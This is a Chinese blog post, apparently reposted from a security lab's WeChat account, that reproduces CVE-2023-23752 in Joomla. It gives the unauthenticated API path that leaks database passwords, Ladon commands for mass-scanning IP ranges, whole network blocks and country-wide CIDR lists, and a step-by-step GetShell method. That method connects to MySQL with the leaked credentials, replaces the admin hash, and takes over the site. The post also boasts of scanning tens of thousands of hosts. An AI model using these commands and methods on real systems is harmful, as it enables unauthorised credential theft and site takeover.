Ladon复现Joomla! 未授权漏洞读取密码CVE-2023-23752

Ladon 10.9 20230224

[+]JoomlaPwd  CVE-2023-23752 未授权读取网站数据库密码（主机 邮箱 数据库 用户 密码）[u]LadonExp    修复PocTag PocName处理双引号的bug[u]WeblogicPoc  不再探测Banner 影响速度[u]WhatCMS    [u]NetGearPwd  IP自动转url[u]MSNSwitchPwd  IP自动转url[u]T3Info[u]whatcms  增加一些端口[u]portscan  增加一些端口 更新WebBanner WebTitle

漏洞简介

Joomla！是一套全球知名的内容管理系统（CMS），其使用PHP语言加上MySQL数据库开发。2月16日，Joomla官方发布安全公告，修复了Joomla! CMS中的一个未授权访问漏洞（CVE-2023-23752），目前该漏洞的细节及PoC/EXP已公开。Joomla! CMS 版本4.0.0 - 4.2.7中访问限制不当，可能导致未授权访问Rest API，造成敏感信息泄露（如数据库账号密码等）。鉴于该漏洞影响较大，建议客户尽快做好自查及防护。

实战效果

通过漏洞读取到密码，还需看目标是否允许远程连接Mysql，默认是不允许连接的，所以实战还得靠运气，并不是说拿到密码就能造成严重后果。连接成功后，能不能RCE拿到权限，还得看MYSQL版本，读写权限等多因素影响。

影响版本

Joomla! CMS 4.0-4.2.7

GetShell条件

1. 存在未授权访问漏洞

2. 开放MYSQL端口

3. 可连MYSQL(无IP限制)

4. 可写权限
   

POC

/api/index.php/v1/config/application?public=true

可以看到Poc非常简单，浏览器访问即可，所以应该有很多人在乱扫了。复现也非常简单，本地phpstudy搭个joomla环境，LadonEXP添加POC

LadonExp生成DLL

添加poc后，编译生成DLL，点击测试，可以看到返回数据中包含密码

PocTag填写 "attributes":{"password"   最新版10.9才支持双引号

PocName  ISVUL

再次测试即可得到Ladon专用的高效批量POC

漏洞检测

生成后的POC，通过Ladon调用，支持多种格式批量，大大提高工作效率，管理员可快速检测内网C段、外网C段相关资产是否存在漏洞，然后修复。

Ladon 192.168.1.1 LadonPoc48.dllLadon http://192.168.1.1 LadonPoc48.dll

指定IP范围扫描

Ladon 192.168.1.50-192.168.1.200 ICMP  ICMP探测1段50-200的存活主机

指定网段范围扫描

Ladon 192.168.1.30-192.168.50.80 ICMP  ICMP探测1.30至50.80存活主机

URL批量检测

相关资产引擎导出joomla的URL列表，保存为url.txt

Ladon url.txt LadonPoc48.dll

内网或外网C段、B段、A段漏洞检测

相关搜索引擎搜索结果不一定全，未必收录到目标资产,内网资产就更加了，所以Ladon的批量不只局限在url.txt,格式非常丰富，只需实现POC，无论是扫内网还是外网，都可以轻轻松松批量检测。

Ladon 192.168.1.1/c LadonPoc48.dllLadon 192.168.1.1/b LadonPoc48.dllLadon 192.168.1.1/a LadonPoc48.dll

内网或外网批量C段、B段列表检测

Ladon ip24.txt LadonPoc48.dllLadon ip16.txt LadonPoc48.dll

指定国家网段检测

cidr.txt里存放，C段、B段或cidr格式IP即可

Ladon cidr.txt LadonPoc48.dll

测试几万IP，存在洞的才1000，但有多少可连接Mysql未测

Ladon子模块JoomlaPwd读取密码

存在漏洞URL，返回ISVUL、主机、邮箱、数据库、用户、密码等信息

##### 199 JoomlaPwd CVE-2023-23752 未授权网站数据库密码读取Ladon 192.168.1.8/24 JoomlaPwdLadon 192.168.1.8 JoomlaPwdLadon http://192.168.1.8 JoomlaPwdLadon url.txt JoomlaPwd

注:  发布版本 已把URL和密码分开显示

扫描HTTP或HTTPS

结尾添加http或https代表传入ip强制转换为url，http对应80端口,https对应443端口，该功能仅适用于WEB相关模块，非URL参数模块不要使用

Ladon 192.168.1.8/24 JoomlaPwd 默认扫描httpLadon 192.168.1.8/24 JoomlaPwd https 所有ip转成https扫描

WhatCMS模块

WhatCMS模块默认探测常见Web端口，扫C段或B段速度较慢但结果全，如果你明确C段只开放了80和443端口，那么就没必要默认扫一堆端口

Ladon 192.168.1.8/24 WhatCMS 默认扫描常见Web端口并识别CMSLadon 192.168.1.8/24 WhatCMS https 所有ip转成http只扫描80端口Ladon 192.168.1.8/24 WhatCMS https 所有ip转成https只扫描443

如果扫描的URL较多可使用重定向输出txt结果

Ladon url.txt JoomlaPwd > joomlaPwd.txt

注:  发布版本 已把URL和密码分开显示

MysqlScan批量检测已知数据库密码

check.txt内容(主机 数据库 用户 密码)，Oracle、mssql、ssh等同理

192.168.1.1 dbtest root toor10.123.1.5 joomla root 12345610.123.1.5 3306 joomla root 123456

使用以下命令检测

Ladon MysqlScan

GetShell方法

检测成功的密码保存在MysqlScan.log文件中，可通过Navicat或Mysql客户端工具连接，找到joomla后台用户密码，替换Hash，登陆后台GetShell，成功后再改回原密码。其它方法，通过mysql客户端getshell，参考phpmyadmin或mysql提权，或者某些MYSQL版本可直接执行命令。

域名解析IP

若客户端不支持域名连接Mysql，则需先解析IP再进行连接

原文始发于微信公众号（K8实验室）：Ladon复现Joomla! 未授权漏洞读取密码CVE-2023-23752